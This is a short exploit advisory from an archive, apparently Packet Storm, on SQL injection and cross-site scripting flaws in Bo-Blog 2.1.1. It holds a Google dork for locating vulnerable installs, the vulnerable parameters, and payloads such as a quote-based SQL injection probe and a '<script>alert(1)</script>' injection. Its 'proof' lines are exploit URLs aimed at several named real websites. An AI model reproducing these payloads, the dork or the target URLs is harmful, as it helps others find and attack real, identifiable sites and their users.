Bo-Blog 2.1.1 Cross Site Scripting / SQL Injection

2013-08-20T00:00:00
ID PACKETSTORM:122878
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-08-20T00:00:00

Description

                                        
                                            `# Exploit Title : Bo-Blog 2.1.1 Multiple Vulnerabilites  
#****************************************************************************  
# Exploit Author : Ashiyane Digital Security Team  
#************************************************  
# Official site : http://www.bo-blog.com/  
# Tested on: Windows,Linux  
#*************************  
#  
#///////////////////////////////////////////////  
# Google Dork : intext:"Powered by Bo-Blog 2.1.1"  
#///////////////////////////////////////////////  
#  
# Exploit 1 : Sql Injection  
#  
# Location : /view.php?go=userlist&ordered=1[Sql Injection]  
#  
#  
# Proof:  
#  
# http://www.landsaywilson.com//view.php?go=userlist&ordered=1%27  
#  
# http://itaoblog.com/view.php?go=userlist&ordered=1%27  
#  
# http://www.landsaywilson.com//view.php?go=userlist&ordered=1%27  
#  
# http://www.9enjoy.com/view.php?go=userlist&ordered=1%27  
#  
# http://www.hongcn.com/en/view.php?go=userlist&ordered=1%27  
  
-----------------------------------------------------------------------------  
  
# Exploit 2 : Cross site scripting  
#  
# Location : /view.php?go=userlist&ordered=1&usergroup=[xss]  
#  
# Location : /blog//view.php?go=userlist&ordered=1&usergroup=[xss]  
#  
#  
# Proof:  
#  
#  
http://itaoblog.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
#  
# www.landsaywilson.com//view.php?go=userlist&ordered=1&usergroup=  
"/><script>alert(1);</script>  
#  
#  
http://www.boneboy.net/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
#  
#  
http://itlife365.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
#  
#  
http://www.hongcn.com/en/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
##############--------  
discovered by : ACC3SS  
##############--------  
`